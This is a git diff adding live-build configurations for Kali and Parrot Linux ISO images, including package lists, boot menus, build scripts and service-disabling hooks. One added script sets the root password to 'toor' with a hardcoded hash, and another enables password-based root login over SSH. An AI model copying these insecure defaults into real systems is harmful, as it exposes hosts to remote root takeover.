/dev/null +++ b/modules/live-build-config/kali-config/common/includes.chroot/usr/lib/live/config/0031-root-password @@ -0,0 +1,5 @@ +#!/bin/sh + +# Set "toor" as root password +usermod -p 'X014elvznJq7E' root + diff --git a/modules/live-build-config/kali-config/common/includes.chroot/usr/lib/live/config/1165-fix-openssh-server b/modules/live-build-config/kali-config/common/includes.chroot/usr/lib/live/config/1165-fix-openssh-server new file mode 100755 index 00000000..69df58e1 --- /dev/null +++ b/modules/live-build-config/kali-config/common/includes.chroot/usr/lib/live/config/1165-fix-openssh-server @@ -0,0 +1,7 @@ +#!/bin/sh + +# Allow PasswordAuthentification in sshd config +sed -i -e 's|#\?\(PasswordAuthentication\) no|\1 yes|' /etc/ssh/sshd_config + +# Allow root login with password +sed -i -e 's|#\?\(PermitRootLogin\) prohibit-password|\1 yes|' /etc/ssh/sshd_config diff --git a/modules/live-build-config/kali-config/common/includes.installer/preseed.cfg b/modules/live-build-config/kali-config/common/includes.installer/preseed.cfg new file mode 100644 index 00000000..31fffa91 --- /dev/null +++ b/modules/live-build-config/kali-config/common/includes.installer/preseed.cfg @@ -0,0 +1,41 @@ +# This file replaces preseed.cfg embedded in the initrd by +# debian-installer. It should be kept in sync except with the +# mirror/{codename,suite} dropped so that the image installs +# what's available on the CD instead of hardcoding a specific +# release. + +# Default repository information (don't include codename data, d-i figures it +# out from what's available in the ISO) +d-i mirror/country string enter information manually +d-i mirror/http/hostname string http.kali.org +d-i mirror/http/directory string /kali + +# Disable security, volatile and backports +d-i apt-setup/services-select multiselect + +# Enable contrib and non-free +d-i apt-setup/non-free boolean true +d-i apt-setup/contrib boolean true + +# Disable CDROM entries after install +d-i apt-setup/disable-cdrom-entries boolean true + +# Disable source repositories too +d-i apt-setup/enable-source-repositories boolean false + +# Upgrade installed packages +d-i pkgsel/upgrade select full-upgrade + +# Change default hostname +# DISABLED: We take care of this by forking netcfg until #719101 is fixed +# d-i netcfg/get_hostname string kali +# d-i netcfg/get_hostname seen false + +# Do not create a normal user account +d-i passwd/make-user boolean false + +# Enable eatmydata in kali-installer to boost speed installation +d-i preseed/early_command string anna-install eatmydata-udeb + +# Disable popularity-contest +popularity-contest popularity-contest/participate boolean false diff --git a/modules/live-build-config/kali-config/common/package-lists/firmware.list.chroot b/modules/live-build-config/kali-config/common/package-lists/firmware.list.chroot new file mode 100644 index 00000000..6b77d197 --- /dev/null +++ b/modules/live-build-config/kali-config/common/package-lists/firmware.list.chroot @@ -0,0 +1,29 @@ +## +## Add all known firmwares +## +#if ARCHITECTURES i386 amd64 +firmware-b43legacy-installer +firmware-b43-installer +#endif +zd1211-firmware +firmware-linux +firmware-netxen +firmware-ralink +firmware-realtek +firmware-iwlwifi +firmware-intelwimax +firmware-ipw2x00 +firmware-atheros +firmware-bnx2 +firmware-libertas +bluez-firmware +firmware-brcm80211 +firmware-amd-graphics +firmware-cavium +firmware-intel-sound +firmware-misc-nonfree +firmware-myricom +firmware-qlogic +firmware-samsung +firmware-siano +firmware-ti-connectivity diff --git a/modules/live-build-config/kali-config/common/package-lists/kali.list.binary b/modules/live-build-config/kali-config/common/package-lists/kali.list.binary new file mode 100644 index 00000000..39ba5abc --- /dev/null +++ b/modules/live-build-config/kali-config/common/package-lists/kali.list.binary @@ -0,0 +1,14 @@ +# ensure eatmydata is available for eatmydata.udeb +eatmydata + +# EFI support, ensure we have the required .deb in the ISO available for +# installation + +#if ARCHITECTURES i386 +grub-efi +grub-efi-ia32 +#endif +#if ARCHITECTURES amd64 +grub-efi +grub-efi-amd64 +#endif diff --git a/modules/live-build-config/kali-config/common/package-lists/linux-headers.chroot b/modules/live-build-config/kali-config/common/package-lists/linux-headers.chroot new file mode 100644 index 00000000..cd8eacb1 --- /dev/null +++ b/modules/live-build-config/kali-config/common/package-lists/linux-headers.chroot @@ -0,0 +1,20 @@ +## +## Add linux headers to build DKMS packages even after the kernel +## used to build the live images is gone from kali-rolling. +## +#if ARCHITECTURES i386 +linux-headers-686-pae +#endif +#if ARCHITECTURES amd64 +linux-headers-amd64 +#endif +#if ARCHITECTURES arm64 +linux-headers-arm64 +#endif +#if ARCHITECTURES armel +linux-headers-marvell +#endif +#if ARCHITECTURES armhf +linux-headers-armmp +linux-headers-armmp-lpae +#endif diff --git a/modules/live-build-config/kali-config/common/package-lists/standard.list.chroot b/modules/live-build-config/kali-config/common/package-lists/standard.list.chroot new file mode 100644 index 00000000..f17ce401 --- /dev/null +++ b/modules/live-build-config/kali-config/common/package-lists/standard.list.chroot @@ -0,0 +1 @@ +! Packages Priority standard diff --git a/modules/live-build-config/kali-config/common/preseed/kali.cfg.chroot b/modules/live-build-config/kali-config/common/preseed/kali.cfg.chroot new file mode 100644 index 00000000..e3d3e954 --- /dev/null +++ b/modules/live-build-config/kali-config/common/preseed/kali.cfg.chroot @@ -0,0 +1,5 @@ +# Various preseeding for auto-installed packages + +# Do not register it in inetd so that its status can be controlled +# individually +atftpd atftpd/use_inetd boolean false diff --git a/modules/live-build-config/kali-config/variant-cinnamon/package-lists/kali.list.chroot b/modules/live-build-config/kali-config/variant-cinnamon/package-lists/kali.list.chroot new file mode 100644 index 00000000..44bf10f1 --- /dev/null +++ b/modules/live-build-config/kali-config/variant-cinnamon/package-lists/kali.list.chroot @@ -0,0 +1,25 @@ +# You always want those +kali-linux +kali-desktop-live + +# Kali applications + +# You can customize the set of Kali applications to install +# (-full is the default, -all is absolutely everything, the rest +# corresponds to various subsets) +kali-linux-full +# kali-linux-all +# kali-linux-sdr +# kali-linux-gpu +# kali-linux-wireless +# kali-linux-web +# kali-linux-forensic +# kali-linux-voip +# kali-linux-pwtools +# kali-linux-top10 +# kali-linux-rfid + +# Graphical desktop +cinnamon-desktop-environment +file-roller +gdm3 diff --git a/modules/live-build-config/kali-config/variant-default b/modules/live-build-config/kali-config/variant-default new file mode 120000 index 00000000..2ef8d92c --- /dev/null +++ b/modules/live-build-config/kali-config/variant-default @@ -0,0 +1 @@ +variant-gnome \ No newline at end of file diff --git a/modules/live-build-config/kali-config/variant-e17/hooks/live/tweak-enlightenment-config.chroot b/modules/live-build-config/kali-config/variant-e17/hooks/live/tweak-enlightenment-config.chroot new file mode 100755 index 00000000..8b6ca882 --- /dev/null +++ b/modules/live-build-config/kali-config/variant-e17/hooks/live/tweak-enlightenment-config.chroot @@ -0,0 +1,10 @@ +#!/bin/sh + +# Inject default background in e17 configuration (for all known profiles) +for profile in mobile standard; do + dpkg-divert --local --add /usr/share/enlightenment/data/config/$profile/e.cfg + eet -d /usr/share/enlightenment/data/config/$profile/e.cfg config /tmp/e.src + awk '/value "desktop_default_name"/ {print " value \"desktop_default_background\" string: \"/usr/share/enlightenment/data/backgrounds/kali-wallpaper_1920x1200.edj\";"}; {print}' /tmp/e.src >/tmp/e2.src + eet -e /usr/share/enlightenment/data/config/$profile/e.cfg config /tmp/e2.src 1 + rm -f /tmp/e.src /tmp/e2.src +done diff --git a/modules/live-build-config/kali-config/variant-e17/includes.chroot/usr/share/enlightenment/data/backgrounds/kali-wallpaper_1920x1200.edj b/modules/live-build-config/kali-config/variant-e17/includes.chroot/usr/share/enlightenment/data/backgrounds/kali-wallpaper_1920x1200.edj new file mode 100644 index 00000000..351dc11d Binary files /dev/null and b/modules/live-build-config/kali-config/variant-e17/includes.chroot/usr/share/enlightenment/data/backgrounds/kali-wallpaper_1920x1200.edj differ diff --git a/modules/live-build-config/kali-config/variant-e17/package-lists/kali.list.chroot b/modules/live-build-config/kali-config/variant-e17/package-lists/kali.list.chroot new file mode 100644 index 00000000..42e66614 --- /dev/null +++ b/modules/live-build-config/kali-config/variant-e17/package-lists/kali.list.chroot @@ -0,0 +1,27 @@ +# You always want those +kali-linux +kali-desktop-live + +# Kali applications + +# You can customize the set of Kali applications to install +# (-full is the default, -all is absolutely everything, the rest +# corresponds to various subsets) +kali-linux-full +# kali-linux-all +# kali-linux-sdr +# kali-linux-gpu +# kali-linux-wireless +# kali-linux-web +# kali-linux-forensic +# kali-linux-voip +# kali-linux-pwtools +# kali-linux-top10 +# kali-linux-rfid + +# Graphical desktop +kali-desktop-common +xorg +e17 +# To tweak default configuration with help of /usr/bin/eet +libeet-bin diff --git a/modules/live-build-config/kali-config/variant-gnome/package-lists/kali.list.chroot b/modules/live-build-config/kali-config/variant-gnome/package-lists/kali.list.chroot new file mode 100644 index 00000000..eb643c5f --- /dev/null +++ b/modules/live-build-config/kali-config/variant-gnome/package-lists/kali.list.chroot @@ -0,0 +1,23 @@ +# You always want those +kali-linux +kali-desktop-live + +# Kali applications + +# You can customize the set of Kali applications to install +# (-full is the default, -all is absolutely everything, the rest +# corresponds to various subsets) +kali-linux-full +# kali-linux-all +# kali-linux-sdr +# kali-linux-gpu +# kali-linux-wireless +# kali-linux-web +# kali-linux-forensic +# kali-linux-voip +# kali-linux-pwtools +# kali-linux-top10 +# kali-linux-rfid + +# Graphical desktop +kali-desktop-gnome diff --git a/modules/live-build-config/kali-config/variant-i3wm/package-lists/kali.list.chroot b/modules/live-build-config/kali-config/variant-i3wm/package-lists/kali.list.chroot new file mode 100644 index 00000000..36220287 --- /dev/null +++ b/modules/live-build-config/kali-config/variant-i3wm/package-lists/kali.list.chroot @@ -0,0 +1,27 @@ +# You always want those +kali-linux +kali-desktop-live + +# Kali applications + +# You can customize the set of Kali applications to install +# (-full is the default, -all is absolutely everything, the rest +# corresponds to various subsets) +kali-linux-full +# kali-linux-all +# kali-linux-sdr +# kali-linux-gpu +# kali-linux-wireless +# kali-linux-web +# kali-linux-forensic +# kali-linux-voip +# kali-linux-pwtools +# kali-linux-top10 +# kali-linux-rfid + +# Graphical desktop +kali-desktop-common +xorg +dmenu +conky +i3 diff --git a/modules/live-build-config/kali-config/variant-kde/package-lists/kali.list.chroot b/modules/live-build-config/kali-config/variant-kde/package-lists/kali.list.chroot new file mode 100644 index 00000000..6eb3741c --- /dev/null +++ b/modules/live-build-config/kali-config/variant-kde/package-lists/kali.list.chroot @@ -0,0 +1,23 @@ +# You always want those +kali-linux +kali-desktop-live + +# Kali applications + +# You can customize the set of Kali applications to install +# (-full is the default, -all is absolutely everything, the rest +# corresponds to various subsets) +kali-linux-full +# kali-linux-all +# kali-linux-sdr +# kali-linux-gpu +# kali-linux-wireless +# kali-linux-web +# kali-linux-forensic +# kali-linux-voip +# kali-linux-pwtools +# kali-linux-top10 +# kali-linux-rfid + +# Graphical desktop +kali-desktop-kde diff --git a/modules/live-build-config/kali-config/variant-light/package-lists/kali.list.chroot b/modules/live-build-config/kali-config/variant-light/package-lists/kali.list.chroot new file mode 100644 index 00000000..5dfc12ba --- /dev/null +++ b/modules/live-build-config/kali-config/variant-light/package-lists/kali.list.chroot @@ -0,0 +1,13 @@ +# You always want those +kali-desktop-live + +# Kali applications +iceweasel +openssh-server +nmap +ncrack +sqlmap +aircrack-ng + +# A light desktop +kali-desktop-xfce diff --git a/modules/live-build-config/kali-config/variant-lxde/package-lists/kali.list.chroot b/modules/live-build-config/kali-config/variant-lxde/package-lists/kali.list.chroot new file mode 100644 index 00000000..0614b463 --- /dev/null +++ b/modules/live-build-config/kali-config/variant-lxde/package-lists/kali.list.chroot @@ -0,0 +1,23 @@ +# You always want those +kali-linux +kali-desktop-live + +# Kali applications + +# You can customize the set of Kali applications to install +# (-full is the default, -all is absolutely everything, the rest +# corresponds to various subsets) +kali-linux-full +# kali-linux-all +# kali-linux-sdr +# kali-linux-gpu +# kali-linux-wireless +# kali-linux-web +# kali-linux-forensic +# kali-linux-voip +# kali-linux-pwtools +# kali-linux-top10 +# kali-linux-rfid + +# Graphical desktop +kali-desktop-lxde diff --git a/modules/live-build-config/kali-config/variant-mate/package-lists/kali.list.chroot b/modules/live-build-config/kali-config/variant-mate/package-lists/kali.list.chroot new file mode 100644 index 00000000..9a4e749f --- /dev/null +++ b/modules/live-build-config/kali-config/variant-mate/package-lists/kali.list.chroot @@ -0,0 +1,31 @@ +# You always want those +kali-linux +kali-desktop-live + +# Kali applications + +# You can customize the set of Kali applications to install +# (-full is the default, -all is absolutely everything, the rest +# corresponds to various subsets) +kali-linux-full +# kali-linux-all +# kali-linux-sdr +# kali-linux-gpu +# kali-linux-wireless +# kali-linux-web +# kali-linux-forensic +# kali-linux-voip +# kali-linux-pwtools +# kali-linux-top10 +# kali-linux-rfid + +# Graphical desktop +# | NOTE: With Kali 1.x, the mate desktop requires other changes to the live config. +# | See http://docs.kali.org/live-build/customize-the-kali-desktop-environment +# | for details +kali-desktop-common +xorg +#if DISTRIBUTION moto +mate-archive-keyring +#endif +mate-desktop-environment diff --git a/modules/live-build-config/kali-config/variant-xfce/package-lists/kali.list.chroot b/modules/live-build-config/kali-config/variant-xfce/package-lists/kali.list.chroot new file mode 100644 index 00000000..7deb419d --- /dev/null +++ b/modules/live-build-config/kali-config/variant-xfce/package-lists/kali.list.chroot @@ -0,0 +1,23 @@ +# You always want those +kali-linux +kali-desktop-live + +# Kali applications + +# You can customize the set of Kali applications to install +# (-full is the default, -all is absolutely everything, the rest +# corresponds to various subsets) +kali-linux-full +# kali-linux-all +# kali-linux-sdr +# kali-linux-gpu +# kali-linux-wireless +# kali-linux-web +# kali-linux-forensic +# kali-linux-voip +# kali-linux-pwtools +# kali-linux-top10 +# kali-linux-rfid + +# Graphical desktop +kali-desktop-xfce diff --git a/modules/parrot-build/README b/modules/parrot-build/README new file mode 100644 index 00000000..bf155110 --- /dev/null +++ b/modules/parrot-build/README @@ -0,0 +1,7 @@ +Parrot Build config scripts + + +this configuration folder for live-build is used +to build our official ISO images + +the arm build scripts will be replaced with the official one of the ARM team diff --git a/modules/parrot-build/auto/build b/modules/parrot-build/auto/build new file mode 100755 index 00000000..50298b85 --- /dev/null +++ b/modules/parrot-build/auto/build @@ -0,0 +1,3 @@ +#!/bin/sh + +lb build noauto "$@" 2>&1 | tee logfile.log diff --git a/modules/parrot-build/auto/clean b/modules/parrot-build/auto/clean new file mode 100755 index 00000000..3fa73dfc --- /dev/null +++ b/modules/parrot-build/auto/clean @@ -0,0 +1,3 @@ +#!/bin/sh + +lb clean noauto "$@" diff --git a/modules/parrot-build/auto/config b/modules/parrot-build/auto/config new file mode 100755 index 00000000..3e651cea --- /dev/null +++ b/modules/parrot-build/auto/config @@ -0,0 +1,121 @@ +#!/bin/bash + +set -e +set -o pipefail # Bashism + +parrot_mirror=http://archive.parrotsec.org/parrot + +# Detect target architecture and filter args +if [ ! $arch ]; then + arch=$(dpkg --print-architecture) +fi +if [ ! $variant ]; then + variant="home" +fi +dist="parrot" +lb_opts="" +while [ $# -gt 0 ]; do + arg="$1" + case "$arg" in + -a|--arch|--architecture|--architectures) + arch="$2" + temp="$temp "'"'"$arg"'"' + temp="$temp "'"'"$2"'"' + shift + ;; + --distribution) + dist="$2" + shift + ;; + --variant) + variant="$2" + shift + ;; + -p|--proposed-updates) + enable_pu="1" + ;; + --) + ;; + *) + temp="$temp "'"'"$arg"'"' + ;; + esac + shift +done +eval set -- "$temp" + +# live-build doesn't work if --parent-debian-distribution is unknown of +# debian-cd => we have to put a symlink so that it deals with kali like sid +if [ ! -e ${LIVE_BUILD:-/usr/share/live/build}/data/debian-cd/$dist ]; then + if [ -w ${LIVE_BUILD:-/usr/share/live/build}/data/debian-cd ]; then + ln -sf sid ${LIVE_BUILD:-/usr/share/live/build}/data/debian-cd/$dist + else + echo "ERROR: Run this first:" + echo "ln -sf sid ${LIVE_BUILD:-/usr/share/live/build}/data/debian-cd/$dist" + exit 1 + fi +fi + +case "$arch" in + amd64) + lb_opts="$lb_opts --binary-images iso-hybrid --architecture amd64 --debian-installer live --linux-flavours amd64" + ;; + i386) + lb_opts="$lb_opts --binary-images iso-hybrid --architecture i386 --debian-installer live --linux-flavours 686-pae" + ;; + 486) + lb_opts="$lb_opts --binary-images iso-hybrid --architecture i386 --debian-installer live --linux-flavours 486" + ;; + armel|armhf|arm64) + lb_opts="$lb_opts --binary-images hdd --binary-filesystem ext4 --chroot-filesystem none" + ;; + *) + echo "WARNING: configuration not tested on arch $arch" >&2 + ;; +esac + +# Setup configuration files from variant and options + +# Drop all files that a former run might have put into place +for file in $(cd config && find . -type f); do + file=${file#./*/} + rm -f config/$file || true +done + +cp -rT templates/common config +[ ! -d templates/parrot-$variant ] || cp -rTL templates/parrot-$variant config + +[ ! $arch ] || sed -i "s/ISO_ARCH/$arch/g" config/includes.binary/isolinux/menu.cfg +[ ! $arch ] || sed -i "s/ISO_ARCH/$arch/g" config/includes.binary/boot/grub/live-theme/theme.txt +[ ! $version ] || sed -i "s/ISO_VERSION/$version/g" config/includes.binary/isolinux/menu.cfg +[ ! $version ] || sed -i "s/ISO_VERSION/$version/g" config/includes.binary/boot/grub/live-theme/theme.txt +[ ! $variant ] || sed -i "s/ISO_TITLE/Parrot $variant/g" config/includes.binary/isolinux/menu.cfg +[ ! $variant ] || sed -i "s/ISO_TITLE/Parrot $variant/g" config/includes.binary/boot/grub/live-theme/theme.txt + +lb config noauto \ + --distribution "$dist" \ + --debian-installer-distribution "$dist" \ + --archive-areas "main contrib non-free" \ + --debootstrap-options "--include=ca-certificates,parrot-archive-keyring,gnupg --keyring=templates/common/archives/parrot.key" \ + --keyring-packages parrot-archive-keyring \ + --updates false \ + --security false \ + --backports false \ + --firmware-binary false \ + --firmware-chroot false \ + --compression xz \ + --mirror-bootstrap "$parrot_mirror" \ + --mirror-chroot "$parrot_mirror" \ + --mirror-debian-installer "$parrot_mirror" \ + --mirror-binary "$parrot_mirror" \ + --iso-application "Parrot" \ + --iso-publisher "Parrot Project" \ + --iso-volume "ParrotSec" \ + --linux-packages linux-image \ + --bootappend-live "boot=live hostname=parrot splash noautomount" \ + --source false \ + $lb_opts \ + "$@" + +#use overlay instead of aufs as union filesystem support for squashfs +sed -i "s/LB_UNION_FILESYSTEM=\"aufs\"/LB_UNION_FILESYSTEM=\"overlay\"/g" config/chroot diff --git a/modules/parrot-build/build.sh b/modules/parrot-build/build.sh new file mode 100755 index 00000000..8e3f8bb8 --- /dev/null +++ b/modules/parrot-build/build.sh @@ -0,0 +1,62 @@ +#!/bin/bash + +set -e +set -o pipefail # Bashism + +export variant=$2 +export arch=$3 +export version=$4 + + +function helper() { + echo -e "Parrot Build System + + +USAGE + ./build.sh [ ] + +EXPLAINATION + + action - help, build + the action to be performed by this program + help will show this message, build will start + the build if correctly combined with variant, arch and version + + variant - full, lite, studio, libre, + variant-gnome, variant-kde, + variant-lxde, variant-xfce, + variant-cinnamon + + the edition of parrot that is going to + be taken from the templates folder + + arch - i386, amd64, armhf, arm64 + the architecture that will be built + + version - the version of parrot that has to be + written in the live boot menu + +EXAMPLE + ./build.sh build home amd64 4.2-CUSTOM +" +} + +function build() { + lb clean + rm -rf config || true + lb config + lb build + mv live-image-*.hybrid.iso ../Parrot-$variant-$version\_$arch.iso +} + +case $1 in + build) + build + ;; + help) + helper + ;; + *) + helper + ;; +esac diff --git a/modules/parrot-build/templates/common/archives/parrot.key b/modules/parrot-build/templates/common/archives/parrot.key new file mode 100644 index 00000000..2ed50863 Binary files /dev/null and b/modules/parrot-build/templates/common/archives/parrot.key differ diff --git a/modules/parrot-build/templates/common/archives/parrot.list b/modules/parrot-build/templates/common/archives/parrot.list new file mode 100644 index 00000000..881a08fd --- /dev/null +++ b/modules/parrot-build/templates/common/archives/parrot.list @@ -0,0 +1,3 @@ +## stable repository +deb http://deb.parrotsec.org/parrot stable main contrib non-free +#deb-src http://archive.parrotsec.org/parrot stable main contrib non-free diff --git a/modules/parrot-build/templates/common/bootloaders/grub-pc/dejavu-bold-14.pf2 b/modules/parrot-build/templates/common/bootloaders/grub-pc/dejavu-bold-14.pf2 new file mode 100644 index 00000000..9b093b20 Binary files /dev/null and b/modules/parrot-build/templates/common/bootloaders/grub-pc/dejavu-bold-14.pf2 differ diff --git a/modules/parrot-build/templates/common/bootloaders/grub-pc/dejavu-bold-16.pf2 b/modules/parrot-build/templates/common/bootloaders/grub-pc/dejavu-bold-16.pf2 new file mode 100644 index 00000000..11e7f7ab Binary files /dev/null and b/modules/parrot-build/templates/common/bootloaders/grub-pc/dejavu-bold-16.pf2 differ diff --git a/modules/parrot-build/templates/common/bootloaders/grub-pc/grub.cfg b/modules/parrot-build/templates/common/bootloaders/grub-pc/grub.cfg new file mode 100644 index 00000000..9f3486f2 --- /dev/null +++ b/modules/parrot-build/templates/common/bootloaders/grub-pc/grub.cfg @@ -0,0 +1,94 @@ +set default=0 + +loadfont $prefix/dejavu-bold-16.pf2 +loadfont $prefix/dejavu-bold-14.pf2 +loadfont $prefix/unicode.pf2 +set gfxmode=auto +insmod all_video +insmod gfxterm +insmod png + +set color_normal=cyan/black +set color_highlight=white/blue + +if [ -e /isolinux/splash.png ]; then + # binary_syslinux modifies the theme file to point to the correct + # background picture + set theme=/boot/grub/live-theme/theme.txt +elif [ -e /boot/grub/splash.png ]; then + set theme=/boot/grub/live-theme/theme.txt +else + set menu_color_normal=cyan/blue + set menu_color_highlight=white/blue +fi + +terminal_output gfxterm + +insmod play +play 960 440 1 0 4 440 1 + +# Live boot +menuentry "Live" { + linux KERNEL_LIVE APPEND_LIVE + initrd INITRD_LIVE +} + +menuentry "Text" { + linux KERNEL_LIVE APPEND_LIVE systemd.unit=multi-user.target + initrd INITRD_LIVE +} + +menuentry "RAM mode" { + linux KERNEL_LIVE APPEND_LIVE toram + initrd INITRD_LIVE +} + +menuentry "Forensics mode" { + linux KERNEL_LIVE APPEND_LIVE noswap noautomount + initrd INITRD_LIVE +} +menuentry "Persistence" { + linux KERNEL_LIVE APPEND_LIVE persistence + initrd INITRD_LIVE +} +menuentry "Encrypted persistence" { + linux KERNEL_LIVE APPEND_LIVE persistent=cryptsetup persistence-encryption=luks persistence + initrd INITRD_LIVE +} + +menuentry "Failsafe (nomodeset)" { + linux KERNEL_LIVE APPEND_LIVE nomodeset + initrd INITRD_LIVE +} + +menuentry "Failsafe (disable nvdia/amd gpu)" { + linux KERNEL_LIVE APPEND_LIVE nouveau.modeset=0 nvidia.modeset=0 radeon.modeset=0 + initrd INITRD_LIVE +} + +menuentry "Failsafe (strong errors prevention)" { + linux KERNEL_LIVE APPEND_LIVE config memtest noapic noapm nodma nomce nolapic nomodeset nosplash vga=normal + initrd INITRD_LIVE +} + +# Installer +menuentry "Installer" { + linux /install/vmlinuz vga=normal quiet + initrd /install/initrd.gz +} + +menuentry "GTK Installer" { + linux /install//gtk/vmlinuz video=vesa:ywrap,mtrr vga=768 quiet + initrd /install/gtk/initrd.gz +} + + +submenu 'Advanced options...' { + +# More installer entries (if any) +LINUX_ADVANCED_INSTALL + +# Memtest (if any) +MEMTEST + +} diff --git a/modules/parrot-build/templates/common/bootloaders/grub-pc/live-theme/theme.txt b/modules/parrot-build/templates/common/bootloaders/grub-pc/live-theme/theme.txt new file mode 100644 index 00000000..b9213c36 --- /dev/null +++ b/modules/parrot-build/templates/common/bootloaders/grub-pc/live-theme/theme.txt @@ -0,0 +1,63 @@ +desktop-image: "../splash.png" +title-color: "#00BEFE" +title-font: "DejaVu Sans Bold 16" +title-text: "" +message-font: "Unifont Regular 16" +terminal-font: "Unifont Regular 16" + +#help bar at the bottom ++ label { + top = 100%-50 + left = 0 + width = 100% + height = 20 + text = "@KEYMAP_SHORT@" + align = "center" + color = "#00BEFE" + font = "DejaVu Sans Bold 14" +} + +# Title in the middle box ++ label { + top = 20% + left = 0 + width = 100% + height = 35 + align = "center" + color = "#00BEFE" + text = "Parrot Project" + font = "DejaVu Sans Bold 16" +} + +#boot menu ++ boot_menu { + left = 13% + width = 74% + top = 20%+35 + height = 230 + item_color = "#a8a8a8" + item_font = "DejaVu Sans Bold 14" + selected_item_color= "#00BEFE" + selected_item_font = "DejaVu Sans Bold 14" + item_height = 16 + item_padding = 0 + item_spacing = 4 + icon_width = 0 + icon_heigh = 0 + item_icon_space = 0 +} + +#progress bar ++ progress_bar { + id = "__timeout__" + left = 13% + top = 100%-80 + height = 16 + width = 74% + font = "DejaVu Sans Bold 14" + text_color = "#000000" + fg_color = "#00BEFE" + bg_color = "#a8a8a8" + border_color = "#00BEFE" + text = "@TIMEOUT_NOTIFICATION_LONG@" +} diff --git a/modules/parrot-build/templates/common/bootloaders/grub-pc/splash.png b/modules/parrot-build/templates/common/bootloaders/grub-pc/splash.png new file mode 100644 index 00000000..3f16015d Binary files /dev/null and b/modules/parrot-build/templates/common/bootloaders/grub-pc/splash.png differ diff --git a/modules/parrot-build/templates/common/bootloaders/grub-pc/splash4.2.png b/modules/parrot-build/templates/common/bootloaders/grub-pc/splash4.2.png new file mode 100644 index 00000000..7a2e7414 Binary files /dev/null and b/modules/parrot-build/templates/common/bootloaders/grub-pc/splash4.2.png differ diff --git a/modules/parrot-build/templates/common/hooks/normal/parrot-hooks.hook.chroot b/modules/parrot-build/templates/common/hooks/normal/parrot-hooks.hook.chroot new file mode 100755 index 00000000..d6e49a2b --- /dev/null +++ b/modules/parrot-build/templates/common/hooks/normal/parrot-hooks.hook.chroot @@ -0,0 +1,108 @@ +#!/bin/bash +set -e +export DEBIAN_FRONTEND=noninteractive + +echo "Removing useless stuff" +apt-get purge -y seclists firefox-esr qt4-designer qttools5-dev-tools texlive-latex-extra-doc texlive-pstricks-doc texlive-pictures-doc texlive-latex-recommended-doc texlive-latex-base-doc texlive-fonts-recommended-doc texlive-pstricks-doc python-mpltoolkits.basemap-data android-sdk libandroid* arduino leafpad xpra ferret minicom xpdf gvim imagemagick vega samba openjdk-9-* || true + + +echo "Manually enabling pulseaudio" +systemctl --user enable pulseaudio.service || true + +echo "Manually enabling live-config" +systemctl enable live-config || true + +echo "Doing some magic on networking stuff" +systemctl enable NetworkManager || true +systemctl enable resolvconf || true +#rm /etc/resolv.conf || true +#ln -s etc/resolvconf/run/resolv.conf etc/resolv.conf || true +mkdir -p /etc/systemd/network /etc/udev/rules.d +ln -sf /dev/null "/etc/systemd/network/90-mac-for-usb.link" +ln -sf /dev/null "/etc/systemd/network/99-default.link" +echo > "/etc/udev/rules.d/73-special-net-names.rules" + +echo "Manually disabling inetd" +systemctl disable inetd || true + +echo "Manually disabling couchdb" +systemctl disable couchdb || true + +echo "Manually disabling mariadb" +systemctl disable mariadb || true + +echo "Manually disabling openvpn" +systemctl disable openvpn || true + +echo "Manualy disabling redis-server" +systemctl disable redis-server || true + +echo "Manually disabling nginx" +systemctl disable nginx || true + +echo "Manually disabling samba" +systemctl disable smbd samba || true + +echo "Manually disabling snmpd" +systemctl disable snmpd || true + +echo "Manually disabling nmbd" +systemctl disable nmbd || true + +echo "Manually disabling snapd" +systemctl disable snapd || true + +echo "Manually disabling openvas services" +systemctl disable openvas-scanner.service || true +systemctl disable openvas-manager.service || true +systemctl disable greenbone-security-assistant || true + +echo "Manually disabling redsocks" +systemctl disable redsocks || true + +echo "Manually disabling dradis" +systemctl disable dradis || true + +echo "Manually disabling packagekit" +systemctl disable packagekit || true + +echo "Manually disabling avahi-daemon" +systemctl disable avahi-daemon.socket || true +systemctl disable avahi-daemon.service || true + +echo "Manually disabling colord-sane" +systemctl disable colord-sane.service || true + +echo "Manually disaling phpsessionclean" +sudo systemctl disable phpsessionclean.timer || true + +echo "Manually disabling apt-daily systemd timers" +sudo systemctl disable apt-daily-upgrade.timer || true +sudo systemctl disable apt-daily.time || true + +echo "Purging the shit out of systemd" +sed -i "s/WantedBy=multi-user.target//g" /lib/systemd/system/redis-server.service || true +sed -i "s/WantedBy=multi-user.target//g" /lib/systemd/system/smbd.service || true +sed -i "s/WantedBy=multi-user.target//g" /lib/systemd/system/nmbd.service || true +sed -i "s/WantedBy=multi-user.target//g" /lib/systemd/system/snmp.service || true +sed -i "s/WantedBy=multi-user.target//g" /lib/systemd/system/openvas-scanner.service || true +sed -i "s/WantedBy=multi-user.target//g" /lib/systemd/system/openvas-manager.service || true +sed -i "s/WantedBy=multi-user.target//g" /lib/systemd/system/redsocks.service || true + +echo "cleaning locales" +bleachbit -c system.localizations apt.autoclean apt.autoremove apt.package_lists deepscan.backup deepscan.ds_store deepscan.thumbs_db deepscan.tmp system.cache system.rotated_logs thumbnails.cache &> /dev/null && echo "done" + + +parrot-mirror-selector default + +echo "adding additional modules to initramfs" +apt -y install initramfs-tools || true +echo "nls_ascii" >> /etc/initramfs-tools/modules +echo "ext4" >> /etc/initramfs-tools/modules +echo "btrfs" >> /etc/initramfs-tools/modules +#echo "zfs" >> /etc/initramfs-tools/modules + +echo "Enabling cryptsetup initramfs support" +sed -i "s/#CRYPTSETUP=/CRYPTSETUP=y/" /etc/cryptsetup-initramfs/conf-hook || true + +update-initramfs -c -u -t -k all || true diff --git a/modules/parrot-build/templates/common/hooks/normal/sleep.hook.chroot b/modules/parrot-build/templates/common/hooks/normal/sleep.hook.chroot new file mode 120000 index 00000000..6a053346 --- /dev/null +++ b/modules/parrot-build/templates/common/hooks/normal/sleep.hook.chroot @@ -0,0 +1 @@ +../sleep.hook.chroot \ No newline at end of file diff --git a/modules/parrot-build/templates/common/hooks/parrot-hooks.hook.chroot b/modules/parrot-build/templates/common/hooks/parrot-hooks.hook.chroot new file mode 120000 index 00000000..da93c952 --- /dev/null +++ b/modules/parrot-build/templates/common/hooks/parrot-hooks.hook.chroot @@ -0,0 +1 @@ +normal/parrot-hooks.hook.chroot \ No newline at end of file diff --git a/modules/parrot-build/templates/common/hooks/sleep.hook.chroot b/modules/parrot-build/templates/common/hooks/sleep.hook.chroot new file mode 100755 index 00000000..a829bb8b --- /dev/null +++ b/modules/parrot-build/templates/common/hooks/sleep.hook.chroot @@ -0,0 +1,6 @@ +#!/bin/sh +sleep 60 +while pgrep -f update-parrot-menu >/dev/null; do + echo "Sleeping 60 seconds as update-parrot-menu is still running..." + sleep 60 +done diff --git 